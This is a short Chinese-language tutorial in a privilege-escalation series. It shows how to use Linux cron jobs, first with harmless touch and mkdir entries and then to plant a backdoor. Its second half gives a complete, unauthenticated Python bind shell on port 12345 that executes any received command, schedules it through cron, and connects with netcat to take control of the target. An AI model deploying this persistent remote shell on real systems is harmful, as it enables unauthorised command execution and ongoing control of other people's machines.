提权(14)之定时任务

含义：在指定的时间执行设定好的任务，如关机、执行命令、备份数据库等。

方式一，以用户名为名字的定时任务。

1. /var/spool/cron
   

复制代码

此目录下会存放以用户名命名的文件的crontab文件，或者是/etc/crontab文件中存在定时任务、
本例中在/var/spool/cron 有一个root为用户名的定时任务，

1. */1 * * * * touch /tmp/xxxx.xx

复制代码

上面的代码表示，每一分钟创建文件xxxx.xx，经过测试，不生效则重启。

1. systemctl restart crond
   

复制代码

相关数据如图：



方式二：
编辑文件 /etc/crontab

打开如图：

1. # m h dom mon dow user command
   

复制代码

m:分钟 h:小时 dom：天 mon:月 dow：星期几 user:用户 command:命令

1. */1 * * * * root mkdir /tmp/93dayuebing

复制代码

查看tmp目录



扩展，利用定时任务反弹shell

1. # -*- coding: utf-8 -*-
   
2. import socket
   
3. import os
   
4. import socket
   
5. import os
   
6. #AF_INET 代表ipv4 SOCK_STREAM==>tcp
   
7. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   
8. # 绑定本地监听端口12345
   
9. s.bind(('0.0.0.0', 12345))
   
10. #设定最多5个客户端连接
    
11. s.listen(5)
    
12. 
    
13. while True:
    
14.         conn, addr = s.accept() #等待客户端连接，客户端未连接，进入阻塞模式
    
15.         for i in range(10):
    
16.                 cmd = conn.recv(1024) #接收来自客户端的最多1024自己的内容
    
17.                 print(cmd) #输出接收到的字节流
    
18.                 command = cmd.decode(encoding='utf-8') #把字节流转换为字符串
    
19.                 if command.startswith("cd"):        #如果是cd开头走里面
    
20.                         os.chdir(command[2:].strip())
    
21.                         result = os.getcwd()
    
22.                 else:                                                                #不是cd 开头走下面
    
23.                         result = os.popen(command).read()  #执行命令，读取结果
    
24.                 if result:
    
25.                         conn.send(result.encode('utf-8'))        #发送结果给客户端
    
26.                 else:
    
27.                         conn.send(b'ok')
    

复制代码

添加定时任务



本地系统执行nc -nv 目标IP 12345


目标已上线。